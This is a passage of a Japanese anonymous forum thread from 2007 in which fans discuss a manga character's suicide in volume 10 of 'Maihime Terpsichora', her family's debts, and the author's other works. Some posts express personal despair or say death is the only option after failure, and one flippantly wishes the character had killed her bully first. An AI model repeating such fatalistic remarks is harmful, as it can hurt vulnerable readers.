昨日、本屋で舞姫新刊を読んで(既巻は読んでた)人目も気にせず泣いてしまった
千花に自分を重ねたり、自分を責める母に家族を重ねたりして、安直に死ぬ事を少し思い留まりました
こんな自分の決意をどこかに残しておきたくて、書き込みました
チラ裏すまん。山岸先生有難う
歯を食いしばっても生きて行くぞ

833 :花と名無しさん:2007/01/24(水) 07:07:53 ID:???O
思いきり泣くのは、ストレスを浄化させる効果もあるみたいだよ
私は今日、10巻を買いに行ってこよう

834 :花と名無しさん:2007/01/24(水) 07:35:07 ID:???O
>>823
いや、ふとみはヤジロべー

835 :花と名無しさん:2007/01/24(水) 07:48:27 ID:???0
7日にバァが倒れてチカの手を握り、チカはもう一度がんばろうと思った。
27日?の日記メモで高森に嫌がらせを受け、30日が最後の日記ってこと?

頑固なまでに意思の強いチカなのにやっぱり自殺ってあるのかな。
他殺ってことは絶対にないよね。(実はあのマンションに高森が住んでるとか


836 :花と名無しさん:2007/01/24(水) 08:05:03 ID:???0
単純にみると、自殺のキッカケは、
六花「すぐ元に戻るよ」
千花「・・・」
のくだりだよね。やはりプレッシャーが原因の自殺で、他殺とかはないだろうな。

837 :花と名無しさん:2007/01/24(水) 08:14:40 ID:???O
>>835
頑固だからこそ、自殺の決意が変わらなかったんでは
いっぺん本気で決めたら、
気分的には案外すっきりするんじゃないだろーか
と少し思った
けど、メモを見るとやはり全てをふっきって自殺にまっしぐら、て感じではないようだね

838 :花と名無しさん:2007/01/24(水) 09:37:51 ID:???0
単なる「ゆりもどし」?で、ある意味勢いで飛んじゃったんだと思うけど...
冷静に想像してみてよ。「死のう!」と決意してても、8階の屋上から飛び降りれる?
決意が固いとかいうより、発作的な衝動が無いと、恐怖で飛べませんて。絶対。

なので、千恵子さんでも六花ちゃんでも毛箱のせいでもなく、「鬱」が直接の原因かと。

839 :花と名無しさん:2007/01/24(水) 09:43:32 ID:???0
身内の死っていうのは、病死や事故死や自殺であるにかかわらず、
残された人たちがその死を乗り越えていく過程なんだよね。
死んだ人間はある意味楽だ。もう何も感じないんだから。

840 :花と名無しさん:2007/01/24(水) 09:48:13 ID:???0
>>835
私もそれ悩んだ。
でも、もしかしたら月をまたいでいるのかな?と。
27日→30日→6日でおばあちゃんが死んではいけないといったような気がした。
で、立ち直ろうと頑張り始めた矢先に、何かしらの些細なきっかけで自殺・・・かなと。

841 :名無しんぼ@お腹いっぱい :2007/01/24(水) 10:03:15 ID:???0
>>832
イ` とは言わんが、立ち止まって考えてみたら。

ということでこの本読んで自殺したくなる人はおらんだろう。
少なくとも立ち止まる位はすると思う。
この本読んで自殺する人は、読まなくても自殺する人。
むしろ周囲の人に、悩んでいる人を追いつめ過ぎるなと
暗に言ってる気がするんだが。

この本を批判するなら死んでも生き返るとか転生できるって
描いてるいーかげん少年少女まんがを批判してちょーだい。


842 :花と名無しさん:2007/01/24(水) 11:26:04 ID:???0
自殺をあおってるようには見えんがな。
やっぱ立ち止まらせるものはあると思う。
読んでいて「こうじゃなければ」「まわりも本人ももう少し許していたら」
「生きてさえ居たら他の道でもいくらでも花が咲いたのに」
と思わせるし、遺された物の悲惨さも出てるし。
あ、でも母が後悔してるのは逆効果もあるのかな?
自分の辛さをわからせたい、知らしめたい思春期なんかだと・・・。
でもその後の六花の立ち直りとか見てるとやっぱり死んだらそこで終わりだと感じるよ。

843 :花と名無しさん:2007/01/24(水) 12:16:54 ID:???0
私は正直、がんばってもがんばってもダメなら死ぬしかないのかな、とストレートに思った。
まして自分はチカちゃんみたいに優等生でも美少女でもないし。
夢が叶わないなら他になにもないもの。

チカちゃんがもし自殺しなかったら、プリマになるより幸せな未来はあったの?

844 :花と名無しさん:2007/01/24(水) 12:18:27 ID:???O
完全に千花に感情移入してたら私も
って殉職……するかな?

845 :花と名無しさん:2007/01/24(水) 12:22:07 ID:???0
>>842
道は一つではないのだから、
プリマになれなくても幸せになる可能性はあるよ。
それを「以上」「以下」とするのは千花の問題だしな…。
漫画だけど。

846 :花と名無しさん:2007/01/24(水) 12:24:33 ID:???O
100がダメなら0と考えれば死んじゃうかもね。
世の中20や30の人もいるんだけど、そういう人を見下したり、
あいつなんかに負けないとか思っちゃうと、
一発逆転が無理なら死ぬしかない、と思うのは最近の若者の傾向かもね。

847 :花と名無しさん:2007/01/24(水) 12:33:38 ID:???0
だって20や30で生きる意味がわかんない。
見下されてつらいこと多そうだし。

848 :花と名無しさん:2007/01/24(水) 12:36:51 ID:???0
>>847
人なんて気にしなきゃいいじゃん

849 :花と名無しさん:2007/01/24(水) 12:37:49 ID:???O
夢は、かなわないでしょ?
ごく一握りの人が夢を形にしてるから、スポットライトを浴びる。
でも、夢がかなったから幸せか不幸せかというと、それはわからないでしょ。
生きてると、いいことも辛いこともあるよ。でも、日常の些細な事でも幸せの芽はあるしね。

物を見る角度を変えれば、違うものに見える。

850 :花と名無しさん:2007/01/24(水) 12:38:27 ID:???0
チカならいいお医者さんになれたのにな。

851 :花と名無しさん:2007/01/24(水) 12:48:30 ID:???0
単行本ではF中の教師が千花の話をしているのを聞いていた生徒の正体が
はっきりわかるように修正されていたのはガイシュツ?

852 :花と名無しさん:2007/01/24(水) 12:53:08 ID:???0
六花「すぐ元に戻るよ」
千花「・・・」

確かにこの会話の翌日(かそれの近く)に死んじゃったのか
あの朝焼けの横顔で、「お祖母ちゃんごめんね、もう一度踊りたい、
でもやっぱり私は死ぬと思う、心配してくれたのにごめんね、もう決めたの」
って思ったとしたら、あのストレッチは何なのかな?と思う
どうせ自殺するんだから、自分の身体がいかにダメダメになっちゃって
やっぱ自殺した方がいいって、痛めつけるみたいに確認するためにストレッチしたの?

でもそうなら、「それにしても厳しいなバレエは」という厳しい顔つきは、
諦めの表情になると思うけど、漫画では引き締まった表情してるしなぁ
やっぱり再出発しようとしてたんだと思いたい
ゆきが無責任に軽く、どんなにちかが苦しんでるかも正面から受け取らずに
笑顔でかるーーーく「大丈夫だよすぐなおるよ」って言うしな…

853 :花と名無しさん:2007/01/24(水) 13:07:49 ID:???0
千花がバレエすっぱり辞めて医者とか全然違う道を進むとしても
家がバレエ教室だと、ずっとバレエの話題から逃れられないからきつそうだね。
バレエから身を引いても、○○ちゃんがローザンヌ出るとか留学するとか
自分が進んでいたかもしれない世界の話が耳に入ってくるんだから。
六花がバレエ辞めてた時でも家がバレエ教室だと辛そうだったし。
普通の子は辞めたら縁も切れるし、ダンス部部長みたいに後から
落ち着いて振り返って考えることもできるだろうに。

854 :花と名無しさん:2007/01/24(水) 13:12:36 ID:???0
そっかーチカが夜なぞの徘徊をしていたのは
ビルを探すためだったのか。
私はてっきり自暴自棄になって援交してたとかそういう想像してた。

>>806
駿さんのクマのネックレス私も気になりました。
駿さんは草間さんといい感じだね

855 :花と名無しさん:2007/01/24(水) 13:14:06 ID:???0
>>852

この世でだめなら、あの世で踊り続けようと思ったとか・・。


856 :花と名無しさん:2007/01/24(水) 13:15:21 ID:???O
0か100じゃなくても、せいぜい70くらいで満足出来ればそれは幸せ者。どのレベルでも悩みは尽きない。
Aという世界で100になれなくても、Bという世界で別の100を目指せば良いじゃない。
だけど、チカ本人とその周りはAの道しか知らないし、不器用にAで100を目指すことしか考えられなかった。
そこから生まれるのは悲劇だよね、という話だと思った。

857 :花と名無しさん:2007/01/24(水) 13:20:33 ID:???0
価値観の中にバレエしかないからそれが100か0かになるわけで
他の道の価値観を見つけたり気づけたら、そこにはそこの100がある、
って気づいたんじゃないかなぁ。

自分にも中学生の頃あったけど、やっぱり中高生の世界観って
バレエとか一つのことやってるわけじゃない子だってとにかく狭い。
ビバヒルの恋愛関係くらい狭い。


858 :花と名無しさん:2007/01/24(水) 13:25:11 ID:???O
ビバヒルは確かにヤバいw
年中発情期w

859 :花と名無しさん:2007/01/24(水) 13:29:33 ID:???0
ユキってバレエに関わってる時ってチカのことほとんど思い出しもしてなかったね
悪い子じゃないけど、すごく…能天気です

860 :花と名無しさん:2007/01/24(水) 13:33:28 ID:???0
てかさぁ千恵子甘いよ甘すぎる
掲示板で情報漏れしてたなら、外部に話したことなんか
学校でしかないんだから、先生にねじこめよ

「わたくしあの話は家族以外には先生にしかお話してないんですが!!
先日わたくしが学校に訪問したあと翌日にそのようなことが起こってるんですが!!
先生方が不用意に学校でそのような会話をどこかでされたのでしょう!?
そのせいでうちの千花がネットでひどい中傷を受けたんですよ!!
情報管理はどうなっているのですか!!」

ああこの叫びは私の叫びだ(ノ∀`)
千花ちゃあん・・辛かったなあ・・・

861 :花と名無しさん:2007/01/24(水) 13:37:57 ID:???0
もうさ、いっそのこと、毛箱殺してから飛び降りればよかったのに。

862 :名無しんぼ@お腹いっぱい :2007/01/24(水) 13:44:09 ID:???0
>>859
中一の子供に何を求める? 本人の問題でしょ。

きついかもしれんが自殺者の殆どが
視野狭窄と自己肥大に陥ってると思う。
開き直ればたいがいのことは何とかなる。
そう思って40年以上生きてきました。

863 :花と名無しさん:2007/01/24(水) 13:47:17 ID:???0
>>859
それだけ「集中」してるんだよ。(参照:バーレッスンで千花ちゃんを見もしない空美ちゃん)

864 :花と名無しさん:2007/01/24(水) 14:02:48 ID:???0
>>862
すぐユキの年齢出すよね
中1だからしょうがないとかじゃないよ
でもじゃあ40↑のオバはんのあんたは図太くて平気かもしれないね

865 :花と名無しさん:2007/01/24(水) 14:03:34 ID:???O
アンチユキは本当に…しつこいです

866 :名無しんぼ@お腹いっぱい :2007/01/24(水) 14:13:09 ID:???0
メンヘルを惹きつけるスレはここですか……

867 :花と名無しさん:2007/01/24(水) 14:24:28 ID:???0
>>806 ノシ あの熊は何で出来てるのか気になったw

868 :花と名無しさん:2007/01/24(水) 14:44:49 ID:???0
>>812
いや、言いたいこと伝わってるよ。私も同じ感想です。
ギシ先生はそれこそ「イ`」と言っていると思う。

それにしても漫画なのにどうしてこんなに千花ちゃんの死が
泣けるのだろう。そのシーン以降読むのがつらい。
大地が泣いたとこも、自分も篠原邸で同席してるんじゃないかと
思うくらいw涙が出るし。
でもやっぱりギシ先生には千花を自殺ではなく、つらくても
つらくても立ち直る→結果すばらしー人生になった という方向で
描いて欲しかった。

869 :花と名無しさん:2007/01/24(水) 14:45:09 ID:???0
自殺したあとに初めてレッスン場で「つらいストレッチも、もうできないんだ!(泣)」って。
生きてる間にもそう思っておもいやってあげれば・・・・・・・・・。
「したくてもストレッチすらできなくて不安なんだ」と。

870 :花と名無しさん:2007/01/24(水) 15:01:12 ID:???0
今日10巻買って大号泣した・・・
千花・・・あんなに強い子だったのに
ネタバレですでに死ぬのわかっていたのに、それでもよく泣けた。
お祖母ちゃんが千花に反応したところとかも。


871 :花と名無しさん:2007/01/24(水) 15:02:18 ID:???0
>868
漫画だからこそ自殺という思い切った表現もできるわけで。
自殺によって周囲がどんなにつらい思いをするか
じっくりに描き込まれて、読み手が何も自殺しなくてもいいのでは?
他に道はあるんじゃないか?とか色々考えられるし。
作り話だからこそ考える余地が生まれるように思います。

872 :花と名無しさん:2007/01/24(水) 15:13:14 ID:???0
単行本買って飛んできました

外で読んでいたのに「えっ!」って声が出てしまった
自分が姉な立場の所為か「六花みたいな妹いるいるwwww」って思ったり
「六花ちゃんは踊るだけでほめられる」って言葉にグッときてたら・・・

何だか長い友達を亡くしたような気持ちだ

873 :花と名無しさん:2007/01/24(水) 15:17:49 ID:???0
とーちゃんの「顔はきれい」の表現に
どす黒いリアリティを感じますた。

人の形してなかったんだろうな。

874 :花と名無しさん:2007/01/24(水) 15:22:25 ID:???0
そ、そうだよね・・・顔”は”キレイってことは体は・・・
なんとなくタッチの「キレイな顔してるだろ」と同じくらいの感覚で読んでたけど・・・。
うわぁ・・・。

875 :花と名無しさん:2007/01/24(水) 15:23:17 ID:???O
>>813
コンタクトで黄色いドレスの女やってた子?
蜆の好みにジャストフィットだったらしい

876 :花と名無しさん:2007/01/24(水) 15:28:26 ID:???O
頭割れてたか
体から骨が出てたかは知らないが
全身きれいで左膝だけぐちゃぐちゃだったら怖いなぁ。
それはないけど

877 :花と名無しさん:2007/01/24(水) 15:35:02 ID:???O
>867
クマテツをイメージしてるよ、ってことじゃね?

878 :花と名無しさん:2007/01/24(水) 16:18:59 ID:???0
>>871
それわかった上で、心情として書いてるだけだと思うよ。
いちいち人の意見に口出ししなくても。

879 :花と名無しさん:2007/01/24(水) 16:21:19 ID:???0
千花の死は悲しいけれども、
おまいに5000万もかけたのに自殺って・・・って思ったのは
私だけじゃないはず。


880 :花と名無しさん:2007/01/24(水) 16:29:51 ID:???0
いいえ喪前だけ

881 :花と名無しさん:2007/01/24(水) 16:32:43 ID:???0
そうでつか?でも千花だけいなくなり、借金の5000万は残るなんて虚しい…。

882 :花と名無しさん:2007/01/24(水) 16:34:13 ID:???0
ここでネタバレ見て知ってたにもかかわらず、コミックスで読んだら
千花の自殺にかなりのショックを受けてしまった。
トゥオネラで踊る千花が悲しいほどきれい・・・。
ttp://www11.ocn.ne.jp/~pastorel/midi/sib_tuon.html

883 :花と名無しさん:2007/01/24(水) 16:46:24 ID:???0
なんか、ホントに近所に住んでる姉妹の
「可愛くて真面目なお姉ちゃん」が死んじゃったの!みたいなショック

空美ちゃんちも、アパートの中から暴れる音が聞こえてきそうだったし
本当に生きてるみたいなキャラクターづくりが上手いなぁ。

884 :花と名無しさん:2007/01/24(水) 17:01:47 ID:???0
お婆さんの遺産がパパに入ってるだろうから、
5000万ぐらい気にしないだろ。

885 :花と名無しさん:2007/01/24(水) 17:06:51 ID:???0
でも、お父さんの妹夫婦が遺産を半分よこせと主張するかも・・・w

886 :花と名無しさん:2007/01/24(水) 17:08:20 ID:???0
家元に近い位置の先生だったら、お香典だけでもすんごいだろねえ...
お父さんと妹の二人で分けるとしても、お婆さんが亡くなる1週間前に
娘を亡くしてる&多額の借金だけ残ったという事情を考慮して、
妹さんが遠慮して取り分少なくていいとか言いそうでもあったし。>遺産
そんなに心配いらなさそう。

887 :花と名無しさん:2007/01/24(水) 17:10:13 ID:???0
お婆ちゃんが倒れてから面倒見てたのは、利夫さんだしね。

888 :花と名無しさん:2007/01/24(水) 17:12:42 ID:???0
ううっ
急にみのもんた臭が…

889 :花と名無しさん:2007/01/24(水) 17:20:25 ID:???0
あっ、そうだ、婆ちゃんって茶道の有名な先生だもんね。
遺産ありそうだね。

890 :花と名無しさん:2007/01/24(水) 17:24:36 ID:pBnVIWP10
家元に近かったのか・・・。
一人暮らしだし、ピンチにはすぐ飛んでくるし、
そんなすごい先生だとは思わなかった。

891 :花と名無しさん:2007/01/24(水) 17:26:29 ID:???0
でも生体靭移植で何千万も借金作ったんでしょ

892 :花と名無しさん:2007/01/24(水) 17:35:42 ID:???O
借金の保証人はだれだったのかな?
妹は知らなそう。
香典は、お弟子さん抱えてた先生ならそれなりの葬儀で
とびそうだけどな。香典返しで半額くらいは返すだろうし。
土地家屋売って折半か利夫多めにもらって
税金引いて…
それでもまあ、多少楽になるだろうけど。

893 :花と名無しさん:2007/01/24(水) 17:38:20 ID:???0
ユキちゃんの留学話が出た時に、千恵子さんは数年後だったら借金の目処も
ついていたのにと洩らしていたし、借金はそこまで深刻ではなかったんじゃ。
数年頑張れば何千万でも返せる余裕のある家庭なんでしょ。
>>879みたいなことは少なくとも篠原家の人は思ってないと思う。


894 :花と名無しさん:2007/01/24(水) 17:38:44 ID:???0
駿のペンダント、ポメラートとかにある
パヴェダイヤでつくった熊かと思ったけど
あれじゃでかすぎて1000万くらいしそうだから
ちがうな。なんだろ…

895 :花と名無しさん:2007/01/24(水) 17:40:44 ID:???0
>>893
数年後だったら姑の遺産が入る筈だから...とかだったら千恵子さんコワスw

896 :花と名無しさん:2007/01/24(水) 17:41:36 ID:???0
今までのナレーションだと、語り手は未来の六花なようだから
(この時は子供でした…みたいなのがあるし)
第二部は、いきなり六花の娘や息子がでてきたりして

897 :花と名無しさん:2007/01/24(水) 17:42:30 ID:???0
二・三年でまさか篠原のお祖母ちゃんの遺産じゃないよね?と、
ギシ読者として怖い想像してしまったけど千恵子さんはそんな人じゃないな。
二年毎に発表会があって、それで息をついていると言っていたから
思い切って生徒増やしていたから発表会でガツンと稼ぐつもりだったか。
その頃にはチカちゃんもリハビリが済んで治っている予定でいただろうし。

898 :花と名無しさん:2007/01/24(水) 17:45:59 ID:???0
>>893
3年でメドがつくって言ってた気がするけど
パパはただの公務員だし、バレエ教室でたいして儲かるとも思えないんだよね。
まあ前々から篠原家の余裕が謎だったけど。


899 :花と名無しさん:2007/01/24(水) 17:50:23 ID:???0
最悪娘二人が留学する時点(自らが教えるレベルじゃない)で
あの家とスタジオ売るつもりだったのかもなー。
家なら篠原のお祖母ちゃんちあるし。

900 :花と名無しさん:2007/01/24(水) 17:51:06 ID:???0
ほんと、セレブというわけでもないけど
お金持ちっぽい雰囲気はすごくよく出てたね。

食事やおやつが洒落たものだったり
家の造りが洒落ているせいかな

901 :花と名無しさん:2007/01/24(水) 17:54:40 ID:???0
10巻でのおやつ、マドレーヌに缶コーヒーなのはちょっとどうかとおもたが。

902 :花と名無しさん:2007/01/24(水) 17:59:39 ID:???0
納豆ダイエット菌がうっせー

903 :花と名無しさん:2007/01/24(水) 18:10:27 ID:???0
正月にデパ地下で、すごく綺麗で美味しそうな和菓子を見つけたら
それが「小布施堂の栗きんとん」だと知った

篠原姉妹より、食生活が断然貧しいorz

904 :花と名無しさん:2007/01/24(水) 18:11:03 ID:???0
千花が韓国から帰ってきたとき、
六花が「パパがお正月に料亭のおせち予約し忘れて・・・」って言ってたよね。


(;゜ロ゜)ハッ!まさかわざとじゃ・・・。

905 :花と名無しさん:2007/01/24(水) 18:15:45 ID:???0
後半カレーとシチューが多くてチカちゃんじゃないけど太るよって心配になった。

906 :花と名無しさん:2007/01/24(水) 18:17:34 ID:???0
おいなりさんだけとかねw

栄養バランスは、あまり考えてない家だな。

907 :花と名無しさん:2007/01/24(水) 18:31:47 ID:???0
>>906
あれはユキのセレクトwまぁ子供らしいけど。
サラダぐらい作ったらと思ったりはする。

908 :花と名無しさん:2007/01/24(水) 18:33:36 ID:???O
公務員とはいえ、あの教室付き自宅が
青山のおじいちゃんとかの出資で払い済みなら
家賃やローンがなきゃかなり楽なんじゃないかなぁ。
数年きりつめ&レッスン増やした分充てて…とか。
でも私立&本部レッスン、各習い事…に金かかりそうだが
家庭が順調な時は健康的な食事もしてたね。

909 :花と名無しさん:2007/01/24(水) 18:38:47 ID:???0
「おお!うまそうな匂いがする」
「おーひとが作っておいてくれた食事って最高!」
利夫の台詞が泣ける…。

910 :花と名無しさん:2007/01/24(水) 19:01:38 ID:???O
ああ、また他人のお財布事情が気になる人種が…

この人たちは先週納豆を買いあさったのと同じ人種かね?

911 :花と名無しさん:2007/01/24(水) 19:07:37 ID:???0
トゥオネラで踊ってるチカもしょせんユキの自己防衛だしなぁ
ケバコは何一つダメージ追ってなくて平気な顔して篠原家に来れるぐらいの
壊れた精神をしててさ
きっと今後の人生、何一つ自分の罪を自覚もせず悠々と生きてくんでしょう
その反面篠原一家は一生引きずっていく

この世には神も仏も地獄もあの世も天罰も因果応報も超常現象もない
ということがよーくわかる漫画でつね

912 :花と名無しさん:2007/01/24(水) 19:08:20 ID:???0
わざわざ販売店までいって昨日の新聞買ってきてしまった。
広告は記念にとっておこう。。

ちかちゃんが死んでしまうシーンより、トゥオネラで踊っているシーンの方が
えらいなけてしまった・・・

913 :花と名無しさん:2007/01/24(水) 19:29:03 ID:???0
>>910
あほらし。
あんただけだよ。納豆買い占めたのはw

914 :花と名無しさん:2007/01/24(水) 19:44:43 ID:???O
納豆売ってなくて困ったよねー。やっと普通に買えるわw

915 :花と名無しさん:2007/01/24(水) 19:59:28 ID:???0
ギシさんの作品はどれもこれも大好きだったけれど、本気で泣いたのはこれが
初めてだな。電車でマジ泣きしそうになって慌てて閉じた。それでも感情は
昂ぶってて涙を止めるのに必死だった。
これまでの作品は、どんなに悲惨でも客観的に冷静に見れたけど
チカちゃんはダメだ。可哀相すぎる。

916 :花と名無しさん:2007/01/24(水) 20:05:09 ID:???0
涙が直線でぼたぼたぼたっと落ちるところが…
自分も鬱だったときこんな感じだったので身につまされた…
チカちゃん、生きていればきっと良いこともあったのに…

ユキちゃんのその後が楽しみ。ひとみちゃんはそのころ踊っているのかな?

917 :花と名無しさん:2007/01/24(水) 20:19:35 ID:???0
高森に関しては、

生ききれず死に切れずにヴィリになっても引っかかる男はいなかったり、
似たような生き方をした松井に「お前は私だ」と永遠に追いかけられたり、
長物を引きずっていたり、ろくでもない臨死体験したり、
無人島でお互いの肉を喰うグールになっていたり、バンシーになったり、
執着を絶てずに「あなたって本当は欲張りなのね」って言われたり、
黄泉比良坂の亡霊にとり憑かれたり、土葬してもミイラ化していたり、
卒塔婆を持って廊下をバタバタ走ったり、「お前は真っ黒だ」と姉に殺されたり、
フリフリの服着てキエーッと叫んだり、いつまでも家にたどり着けずに彷徨ってたり、
角の生えた子供産んだり、八百比丘尼のエサになったり、蛭子の美少年にストーカーされたり、
さえない妹に川に突き落とされたり、副葬品の日本人形に殺されたり、
子離れできない母親に刺されたり、死人とまぐわいその子を産んで発狂したり、
受験ノイローゼでハーピーを見たと言い張ったり、刑務所で夢と現実が逆転したり・・・





918 :花と名無しさん:2007/01/24(水) 20:28:20 ID:???0
欲張りなのねがわかんない

919 :花と名無しさん:2007/01/24(水) 20:28:21 ID:???0
>>917
こえ〜よ〜

920 :花と名無しさん:2007/01/24(水) 20:37:30 ID:???0
>>918
「ある夜に」だったっけ?

女の人が何人か夜道を歩いてて、みんな裸足で、ある人の足元は石だらけで、
ある人の足元は花いっぱいで、ぽつぽつ交わされる会話から、だんだんそれが
死んだ人たちの魂が「どこか」へ行こうとしてる、とわかってくる…って話。

大往生の人もそれなりにせいいっぱい生きてきた人も、それぞれに成仏していく
中で、(たぶん)生前から不満だらけで、死んでからも文句ばかり言ってる人は
いつまでも(おそらく賽の川原に)取り残されて、先に成仏していく人から言われた
言葉が、「欲張りなのね」だったヤツ。

短編だけど印象的な話だったなー。

921 :花と名無しさん:2007/01/24(水) 20:37:40 ID:???0
死人とまぐわいもわかんない

922 :花と名無しさん:2007/01/24(水) 20:40:56 ID:???O
>>922
イシス、かな。

923 :花と名無しさん:2007/01/24(水) 20:44:59 ID:???0
朝電車の中で読んでてめちゃくちゃブルーになった。
家に帰ってから読み直して号泣。千花ちゃん永遠に・・・

924 :花と名無しさん:2007/01/24(水) 20:55:20 ID:???0
>>917
趣味はオモト栽培ですか

925 :花と名無しさん:2007/01/24(水) 20:58:18 ID:???0
ギシてんてー まじネ申…

926 :(@_@;):2007/01/24(水) 21:05:45 ID:???O
最初の方、クミ一族のおどろおどしさにたまげながら読んでたけど、途中から
裕福家庭からのスタンスで垣間見る日本バレエ事情って感じになって、おっ、路線
変更かと思って読んでたら...油断でした。

何が衝撃って、チカちゃん、寂しいトゥオネラの河のほとりでずっと踊ってるのか。
可哀想すぎる。

927 :花と名無しさん:2007/01/24(水) 21:22:30 ID:???0
六花ちゃんのことは好きだが、
千花ちゃんが死んで借金だけ残ったことを考えると
「何千万なんて嘘だよね!?」という台詞が残酷だったように感じる。

928 :花と名無しさん:2007/01/24(水) 21:23:59 ID:???0
どーせ六花叩きが跋扈してるんだろ?プゲラ 
って思っててスレに来てなかったら、みんななんて反応がピュアのさ
自分自身のほうが考え方がよっぽどひどくて凹むわ‥
千花ちゃんが死んでしまったのが飲み込めてないせいもあるけど、
「やっぱりこの人の漫画って、自分で価値観構築できない人は殺されちゃうんだなぁ」とか考えながら読んでた
もう10回ほど読んでまた来ます‥

929 :花と名無しさん:2007/01/24(水) 21:31:17 ID:???0
小さな頃から家族から期待を受けて応援されて、
本人もこの道でひとかどの人になろうと決心して努力を続けるって
順調にいってるうちは、世間的にはとても好ましく素晴らしい家庭だと評価すると思う。
千花ちゃんの手術がうまくいかなくて、
あまりに深刻で必死にしか行動できなかった両親も気の毒だし、
バレエに楽しさや喜びを見出すことができなかった千花ちゃんもかわいそうだ。

930 :917:2007/01/24(水) 21:32:29 ID:???0
まだまだありました・・・

キルケーに追いかけられて総白髪になったり、
メデュウサとして自分を守り続け入院したり、
「お前が死ねばよかったのに」と母に言われ津波にのまれたり、
視力を失い平家の亡霊によばれたり、
臨死体験生還後も見覚えのある爺に見張られたり、
姉の無意識の悪意に耐え切れず刺し殺しちゃったり、
拒食症で意識が途切れる寸前に敬愛する兄の目が喜んでたり、
「他人無視の君は一人で庭を愛でるがいい」と三行半たたきつけられたり、
「みんな狂ってるじゃない」と思ったら終末の時だったり、
自分は父娘相姦の子と知り胸に狐火が灯ったり・・・

まだあてはめられそうなのが色々ありそう・・・

自分の田舎はまだ10巻発売されてないんだよ・・・
苛立ち紛れに書き連ねちゃった・・・

931 :花と名無しさん:2007/01/24(水) 21:33:57 ID:???0
コワイヨー

932 :花と名無しさん:2007/01/24(水) 21:37:15 ID:???O
>>927
一行目嘘バレバレですよw

933 :花と名無しさん:2007/01/24(水) 21:57:45 ID:???0
例の兄妹事件…
あの両親の手記…
思わず山岸おまえって奴は…と言いたくなった。

現実が山岸に追い付いてきているような気がする。
恐ろしい世の中だなぁ。

934 :花と名無しさん:2007/01/24(水) 22:31:08 ID:???0
>930
>臨死体験生還後も見覚えのある爺に見張られたり、

これは読んでないな〜。まだまだ深いギシ世界。

935 :花と名無しさん:2007/01/24(水) 22:43:48 ID:???0
>>781
> >>775
> セクースは生涯でただ一度だけ、という部分は、



え?
紫とマヤってセックスしたの?
いつのまに・・・・

936 :花と名無しさん:2007/01/24(水) 22:45:12 ID:???0
>>805
つ「馬鹿の考え休むに似たり」

937 :花と名無しさん:2007/01/24(水) 22:45:37 ID:???0
>>933
本誌で千花自殺してしばらくしたら
現実でいじめ自殺報道がつづいたしな・・・
ギシ・・・まさか悪魔とかと契約結んでないだろぉな??

938 :花と名無しさん:2007/01/24(水) 22:58:53 ID:???O
ダビチン派の私はさらっと読んだだけで、きちんと読めない…。
表紙ですら泣ける…

やっぱ、死んじゃだめだよ〜

939 :花と名無しさん:2007/01/24(水) 23:03:56 ID:???0
>>917
>>930
すごっ!

こうして読んでみると
なんつー作品ばっかり書いてるんだギシ先生。

940 :花と名無しさん:2007/01/24(水) 23:33:46 ID:???0
不思議…
高森より六花が憎い…
チカにちょっとキツイこと言われたくらいで(キツかったのか?)
階段でメソメソしたり、先生に早く家に帰るようにと言われたくらいで
机から教科書バラバラ落としたり、すべてがイラつく。
チカは死んじゃったのに、おまえは生きているのだな。

941 :花と名無しさん:2007/01/24(水) 23:33:58 ID:???0
>>935
セクースしたのは月影先生と脚本家?だとおも。


942 :花と名無しさん:2007/01/24(水) 23:42:41 ID:???0
不思議...
高森よりアンチ六花がウザい...

943 :花と名無しさん:2007/01/24(水) 23:48:29 ID:???O
>942
ハゲドウ
千花の死はかなしい。だが、六花もつらいぞ。
残された方は、ずっと背負っていくのだ

944 :花と名無しさん:2007/01/24(水) 23:53:31 ID:???0
死んですぐより、2,3年経ってからの方が、ズシッとくるっていうしね...>悲しみ

945 :花と名無しさん:2007/01/24(水) 23:56:48 ID:4ac1f0AUO
てかユキが悪いとか言ってるやつはものすごく精神年齢低いな。

946 :花と名無しさん:2007/01/25(木) 00:00:12 ID:???0
既出してるかもしれんが、みんなに聞きたい。
六花の踊ったトゥオネラは夢で見た千花の振り付けをそのまま踊ったのかな?
それともそこから自分でイメージを膨らまして、作った?

私は後者と思いたいんだけど、高度なパを使った理由としては前者かなとも思う。


947 :花と名無しさん:2007/01/25(木) 00:04:49 ID:???0
> 私は後者と思いたいんだけど、高度なパを使った理由としては

高度なパの理由って
苦(パの難易度をクリアする=生きる苦しみを乗り越える)のあとに美があるってことを表現してるんだと思ってた


948 :花と名無しさん:2007/01/25(木) 00:15:10 ID:???0
>>946
夢のふりを全部覚えてるような描写はなかったと思うけどなあ
それにチカちゃんが踊るなら夢とはいえ
みんながびっくりするような新しい振り付けじゃなくて
クラシック王道風なんじゃないかな と思うが。。

949 :花と名無しさん:2007/01/25(木) 00:15:34 ID:???0
>>946
最初の白鳥が臥せってるようなポーズとか、ところどころで
夢で見た千花ちゃんのパを取り入れてるような感じかと思う。
高度なパの理由は、夢で見たせいもあるだろうけど、姉の死で脳が
ずっと興奮状態になってて、イマジネーションが溢れ出て止まらなくなってるのかも?
あと、美は高度なテクニックに比例する(by パートナー@名香智子)という法則を
無意識に知っているからかな〜と。
自分の中にあるイメージを表現するには、自分の身体能力を超えたテクニックが
どうしても必要だと。

950 :花と名無しさん:2007/01/25(木) 00:24:31 ID:???0
アレは六花の夢だから、すべて六花の中の世界だと考えれば、夢の振りをそのままでもいいと思う。

せめて死んだ後は何者にも縛られずに自由に踊って欲しいという六花の願望なんだと思う。

951 :花と名無しさん:2007/01/25(木) 00:32:59 ID:???0
六花ちゃんは今回は千花ちゃんの代理で踊ってる印象がある‥
自分のための自分の踊りってやつが第2部で出てきたりしないかな

952 :花と名無しさん:2007/01/25(木) 00:36:56 ID:???0
PTSDになった人とかに、その時の絵とか文章を書かせることが
心の整理の手助けになる、みたいなのあるじゃない。
そういう表現手段がユキちゃんの場合は「踊り」なわけでしょ。
高度なパでもなんでも、とにかく頭の中のイメージを表現「しきる」ことが
大事だったんじゃないかな。

953 :946:2007/01/25(木) 00:39:34 ID:???0
うぉお、皆さん反応早い!dクス!
みんな色々考えてますね、やはり。
>>948の千花ちゃんが踊ってるのは「クラシック王道風」にちょっと納得

954 :花と名無しさん:2007/01/25(木) 00:40:36 ID:???0
連載で読むとやたら重かったり、逆に物足りなかったりするけど、
コミックスでこうやって読んでみると、面白いね。
ふとみが、千花と比較して自分はまだ生きているというのが、
そういうのも理解できるとしても、いけすかなかったけど、
コミックスの流れの中で読むと、復帰場面が嬉しい。

責任感じてか、必死にふとみの尻を叩く五嶋わろす。

